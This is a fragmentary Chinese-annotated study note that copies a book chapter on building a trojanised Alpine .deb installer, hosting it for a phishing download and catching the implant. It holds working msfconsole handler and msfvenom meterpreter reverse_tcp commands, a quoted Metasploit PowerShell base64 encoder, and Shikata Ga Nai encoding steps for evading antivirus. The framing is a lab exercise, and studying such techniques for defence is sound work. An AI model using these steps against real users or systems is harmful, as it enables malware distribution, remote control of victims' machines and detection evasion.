回顾:

metasploitframe 反射过程

msfvenom生成代码命令


Hiding an Implant in a Legitimate File

We’ll execute a similar attack here by sending a phishing email
encouraging a victim to download an updated version of the company’s email client,
Alpine, from a fake site. You’ll execute this attack on the Ubuntu desktop machine in
your virtual environment. Let’s begin by creating the Trojan.

We’ll create our trojan by modifying the Alpine installer, the .deb file, so that it
installs the implant as well as Alpine. Download the legitimate Alpine installer by
running the following command:

kali@kali:~/Desktop/Malware/trojans/$ apt-get download alpine

 extract the contents of the file to the mailTrojan folder by running the following command:

kali@kali:~/Desktop/Malware/trojans/$ engrampa <Alpine DEB file> -e mailTrojan

Editing Your.deb File

You’ll need to edit the Alpine installer’s .deb installation file so that it includes your
malicious implant, so let’s walk through the installer’s structure. All installation files must
contain a DEBIAN folder, which contains the files that describe the program and how to
install it. The installation file can also contain other folders such as var for files or usr for
binaries. These folders are copied to a location relative to the /home directory during
installation. For example, the installer would copy the usr folder to /home/usr. The
installer then will read the contents of the DEBIAN folder.


 Adding the Implant

 

repackage your files into your final .deb installation file. 


Hosting the Trojan(托管特洛伊木马)

kali@kali:~/Desktop/Malware/trojans$ sudo python3 -m http.server 80

Next, you’ll need to start the attacker server that will listen for connections from your
implant. 

kali@kali:~$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/
x86/meterpreter/reverse_tcp; set LHOST <Kali IP address>; set LPORT
8443; run; exit -y“

Downloading the Infected File

访问:http://<Kali IP address>/mailTrojan.deb   下载安装略

how to design your own backdoor. But if you want to install one now, consider using the dbd backdoor designed by Kyle Barnthouse and available at https://github.com/gitdurandal/dbd/.



Evading Antivirus by Using Encoders

You can see which antivirus software will detect your implant by uploading it to Virus Total at
https://www.virustotal.com/gui/.

Antivirus systems use signature detection to attempt to find malware. A malware’s
signature is a unique sequence of bytes that represents it. You can see our malicious
implant’s byte sequence by running the xxd command:

kali@kali:~/Desktop/Malware$ xxd malicious

Encoders change a program’s signature by modifying its bytes without changing its functionality. 

编码器通过修改程序的字节而不改变其功能来更改程序的签名。

启动msf:

sudo msfdb init && msfconsole
msf6 > show encoders 

The Base64 Encoder
 

The powershell_base64 encoder uses the base64 encoding scheme, which converts
binary sequences to text, just like the ASCII encoding scheme mentioned in Chapter 5.
However, unlike ASCII, which converts 8-bit sequences, the base64 encoder converts
6-bit sequences to one of 64 possible printable characters. 

converts the Linux ls command from ASCII to base64.

The last section has only four bits, so the remaining two bits are assumed to be 0,
and the padding character (=) is added to the end. Here is the base64encoded result:
bHM=.

we decode it and pass it to the shell

base64 -d <<< bHM= | sh 

base64 --help          
用法:base64 [选项]... [文件]
使用 Base64 编码/解码文件或标准输入输出。

如果没有指定文件,或者文件为"-",则从标准输入读取。

必选参数对长短选项同时适用。
  -d, --decode          解码数据
  -i, --ignore-garbag   解码时忽略非字母字符
  -w, --wrap=字符数     在指定的字符数后自动换行(默认为76),0 为禁用自动换行
 

举例:

A Bash script containing the ls command will have a different signature from a file
containing base64-encoded values of the base64 -d <<< bHM= | sh command, even though
they are functionally equivalent. This is because both files are stored using ASCII
encoding. Because the signatures are different, an antivirus program may fail to detect
the malicious file containing the base64 values, as described in Figure 10-8

 

 polymorphic 多态的

 这个implant.sh在Kali上是不允许连接Telnet的。

Writing a Metasploit Module

参考:

view the cmd/powershell_base64 encoder by visiting

metasploit-framework/powershell_base64.rb at master · rapid7/metasploit-framework · GitHub

This encoder is used to encode PowerShell scripts for Windows machines.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Encoder
  Rank = ExcellentRanking

  def initialize
    super(
      'Name'             => 'Powershell Base64 Command Encoder',
      'Description'      => %q{
        This encodes the command as a base64 encoded command for powershell.
      },
      'Author'           => 'Ben Campbell',
      'Arch'             => ARCH_CMD,
      'Platform'         => 'win')
  end


  #
  # Encodes the payload
  #
  def encode_block(state, buf)

    # Skip encoding for empty badchars
    if state.badchars.length == 0
      return buf
    end

    if (state.badchars.include? '-') || (state.badchars.include? ' ')
      return buf
    end

    cmd = encode_buf(buf)

    if state.badchars.include? '='
        while cmd.include? '='
          buf << " "
          cmd = encode_buf(buf)
        end
    end

    cmd
  end

  def encode_buf(buf)
    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
    cmd = "powershell -w hidden -nop -e #{base64}"
  end
end

 create a new file called bash_base64.rb inside the Encoders folder.

To test your new encoder, add it to the Metasploit Framework by copying it into the
encoders folder, which you can find by opening your file explorer and navigating to
/usr/share/metasploit-framework/modules/encoders. Create a new folder called bash
and save your bash_base64.rb encoder file here.

Open a new terminal and run the show encoder command in the msfconsole to ensure
that your module was added correctly:

Run the following command to create your encoded implant and save it as
implantEncoded:

kali@kali:~/Desktop/Malware/$ implant.sh | msfvenom --payload --arch x86 --
platform --encoder bash/bash_base64 -o implantEncoded

Test your encoded implant by making it executable and running it:

kali@kali:~/Desktop/Malware/$ chmod +x implantEncoded
kali@kali:~/Desktop/Malware/$ ./implantEncoded

Shikata Ga Nai Encoder

 The following command generates an SGN-encoded payload; remember to replace <Kali-IP> with the IP address of your Kali Linux machine:

sudo msfvenom -a x86 --platform linux -p linux/x86/meterpreter/
reverse_tcp LHOST=<Kali IP address> LPORT=443 ➊ --encoder x86/shikata_ga_nai -i 4 -f elf -o malicious

Logo

开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!

更多推荐